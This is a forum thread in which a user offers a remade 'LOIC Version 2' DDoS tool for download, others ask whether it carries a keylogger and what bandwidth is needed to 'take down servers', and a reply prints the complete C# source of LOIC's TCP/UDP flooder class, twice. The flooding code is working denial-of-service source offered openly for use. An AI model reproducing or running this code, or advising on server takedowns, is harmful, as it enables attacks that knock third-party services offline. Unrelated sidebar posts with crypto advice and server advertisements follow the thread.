Jump to content

Recommended Posts

Posted

LOIC Version 2 is ready!

I got the project, and i remake it, translated it to into Visual Basic.Net,

Also have updated the skin, and buttons, and 15% more powerful than old.

 

Those are the changes from the Version 1.

 

Preview:

 

i1fyqa.jpg

 

Credits: Me

 

Downloads:

Sourceforge.net - Mirror

Posted

from when dos/ddos tools and hacking shits allowed in forum? :D

That's true and you should post that in vip section anyway.

Virus scan ?

Posted

That's true and you should post that in vip section anyway.

Virus scan ?

 



Update




AhnLab-V3

-

20120425



AntiVir

-

20120425



Antiy-AVL

-

20120425



Avast

-

20120426



AVG

-

20120426



BitDefender

-

20120426



ByteHero

-

20120424



CAT-QuickHeal

-

20120425



ClamAV

HackTool.DDOS.LOIC-2

20120426



Commtouch

-

20120426



Comodo

-

20120426



DrWeb

-

20120426



Emsisoft

HackTool.Win32.Oylecann!IK

20120426



eSafe

-

20120425



eTrust-Vet

-

20120425



F-Prot

-

20120425



F-Secure

-

20120426



Fortinet

-

20120426



GData

-

20120426



Ikarus

HackTool.Win32.Oylecann

20120426



Jiangmin

-

20120425



K7AntiVirus

-

20120425



Kaspersky

HEUR:HackTool.MSIL.Flooder.gen

20120426



McAfee

Artemis!395EB361322D

20120426



McAfee-GW-Edition

Artemis!395EB361322D

20120425



Microsoft

-

20120426



NOD32

-

20120426



Norman

-

20120425



nProtect

-

20120425



Panda

-

20120425



PCTools

-

20120424



Rising

-

20120425



Sophos

Troj/Loic-A

20120426



SUPERAntiSpyware

-

20120402



Symantec

-

20120426



TheHacker

-

20120425



TrendMicro

-

20120425



TrendMicro-HouseCall

-

20120426



VBA32

-

20120425



VIPRE

-

20120425



ViRobot

-

20120425



VirusBuster

-

20120425

 

DDOS Tool, Hacking Tool, LOIC, go to google.com screenshoots to looking at there, LOIC V1, all ppl was downloaded it the same details have shown, it's not a clean virus, it's a ddos tool ^.^ i had builded from my vb.net, also, i am using it too, and as well, i will soon start making the new version of this tool (V3). Go search at google man. You will see ^.^ !

Posted

In my net i can have UPLOAD more than 100Mbps(Private Network), why with program i get only 15Mbps? Maby program is bad coded?

 

And, what speed i must have to take down servers;

MySpeed > ISP Speed?

 

 

  • 1 year later...
Posted

can some1 answer me i'm noob at this but when i donwloaded it , my anti-virus said it is an virus i know the ant-virus always say's that with hacking tools but i'm scarred this is a real virus with a keylogger and his going to steal my personal information. can somebody check it if it contains a keylogger or something?

 

-ps sry for my bad english

Posted (edited)

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}
Edited by Aphelion
Posted

 

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}

 

 

this isn't java, its C#

 

Few differences

 

 

using instead of import
bool Resp; instead of boolean Resp;
string Data; instead of String

 

So since C# is .net language I see it possible to be done.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • Dear clients, we strongly advise against holding funds in USDT due to an increase in mass freezes by the issuer. Any wallet can be locked without explanation if your coins happen to be in the wrong place at the wrong time. If you hold savings in USDT, swap them for something safer, such as XMR, BTC, ETH, or similar. When working with crypto, opt for decentralized coins that are technically impossible to freeze. Alternatively, after handling USDT, move your funds into safe assets. To protect your funds, we recommend using XMR, BTC, ETH.
    • Hello everyone, I am looking for a C4 Scions of Destiny (P656) Retail x1 L2OFF Server Pack + Source. My goal is not to launch a server immediately. I want to learn L2OFF server development in C++, understand the original C4 architecture, and eventually build my own project in the future. I have already tried to reach an agreement with a few members who offer C4 projects, but communication has been quite slow, so I decided to ask the community here as well. I'm specifically looking for a Retail x1 version, not a heavily customized x45 or PvP pack. Ideally, the package should include: Complete LoginServer Complete GameServer Source code SQL database AI / NPC scripts Geodata Visual Studio solution/project Everything required to compile, study, and run the server If anyone knows a trusted seller or can recommend a reliable P656 Retail x1 package, I would really appreciate your advice. I would also appreciate hearing from anyone who has purchased a Retail x1 package before and can share their experience. Thank you very much!
    • NEW SEASON OPENING - TODAY ! GRAND OPENING FROM - 10/07/2026, FRIDAY, 20:00 +3 GMT !
    • Elite Lineage II Development | Websites • Master Accounts • Custom Systems • Server Solutions Turn Your Lineage II Project Into a Professional Experience Hello everyone, My name is Frank, and for years I've been developing custom solutions for Lineage II private servers. My focus isn't simply creating attractive websites—it's building complete ecosystems that improve both the player experience and server management. Unlike generic web designers, I understand how Lineage II servers actually work. Every page and system is designed with real gameplay, server administration, and player retention in mind. Whether you're launching your first project or upgrading an established server, I can help you create something that looks and feels like a premium MMORPG. What I Can Build Modern Landing Pages Your landing page is the first impression players have of your server. I create high-end landing pages featuring: • Cinematic hero sections • Animated backgrounds • Countdown timers • Feature showcases • Grand Opening events • Server roadmap • Responsive mobile design • Fast loading and SEO-friendly structure No generic templates. Every landing page is built specifically for your project. Complete Master Account Systems One of my specialties is developing advanced account management panels that integrate naturally with your Lineage II server. Examples include: • Account Dashboard • Character Selection • Character Information • Character Statistics • Combat Power System • Achievement System • Character Mastery • Collections • Daily Rewards • Vote Rewards • Referral Systems • Lucky Wheel • Premium Account Management • Donation Store • Coin Wallet • VIP Services • PIN Protection • Password Management • Inventory Viewer • Warehouse Viewer • Rankings • Online Players • Server Statistics • Event Pages Everything is designed with both usability and visual quality in mind. Custom Web Systems Need something unique? I also develop completely custom features tailored to your server. Examples: • World Boss Event Pages • Raid Boss Tracker • Olympiad Rankings • Castle Siege Overview • Grand Boss Status • Event Management Panels • Daily Hunt Interfaces • Progression Systems • Collection Systems • Custom Shops • Clan Pages • Marketplace • Admin Panels If you have an idea, we can build it. Full Website Development I can create your complete server website, including: • Home • Downloads • News • Patch Notes • Server Information • Wiki • Rankings • Community Pages • Support Center • Knowledge Base • FAQ • Voting Pages • Donation Pages Designed to match your server's identity. Forum Integration Professional integration with community platforms. Examples: • XenForo • phpBB • Discord Integration • Custom Forum Themes • User Synchronization Server Experience Because I actively work with Lineage II servers, I understand much more than web development. Experience includes designing and implementing systems around: • Character progression • Achievement tracking • Collection systems • Daily Hunt mechanics • Lucky Wheel events • Premium services • Server economy • Custom reward systems • World Boss events • Event scheduling • Player dashboards • Administrative tools This allows me to design websites and panels that feel like a natural extension of your server instead of just another website. Technologies • PHP 8 • MySQL / MariaDB • HTML5 • CSS3 • JavaScript • AJAX • Responsive Design • API Integration • Linux Server Environment Why Choose Me? ✔ Years of Lineage II development experience ✔ I understand both the website and the game server ✔ Custom development—not copy-paste templates ✔ Modern UI & UX ✔ Mobile responsive ✔ Clean and optimized code ✔ Long-term support ✔ Fast communication ✔ Flexible solutions for every budget Portfolio Below you'll find examples of projects I've created, including custom landing pages, master account systems, dashboards, progression systems, and unique interfaces developed for real Lineage II servers.     Need Something Unique? Some of the most successful servers stand out because they offer features players haven't seen before. If you have an idea—even if it's only a rough concept—I can help transform it into a polished, fully functional system.     Contact Interested in working together? Feel free to send me a private message with your project details. I'll be happy to discuss your ideas and provide a free estimate. Let's build something your players will remember.     Discord:  https://discord.gg/qnmNkY6D3n
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..